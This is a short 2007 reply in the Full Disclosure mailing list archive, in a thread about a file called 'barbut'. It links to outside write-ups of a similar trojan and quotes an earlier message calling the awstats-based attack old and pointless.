Full Disclosure mailing list archives

Re: Barbut

From: Aleksandar Nikolic <anikolic () phearless org>
Date: Thu, 22 Nov 2007 01:40:41 +0100

Now , I can`t read japanese but this looks similar
http://d.hatena.ne.jp/naablaa/20071121

also , this http://forums.techarena.in/showthread.php?t=856173

related to this
http://www.sophos.com/security/analyses/trojkaitenw.html

all pretty recent ,

as i can see now , that barbut file is mising from the server in your post ,

On Wednesday 21 November 2007 09:44:25 pm Simon Smith wrote:
Vladis,
      Got that right... this vulnerability was released ages ago if memory
serves right. Whats funny is that I am not using a linux host and I do
not use awstats anyway... makes the attack even more pathetic.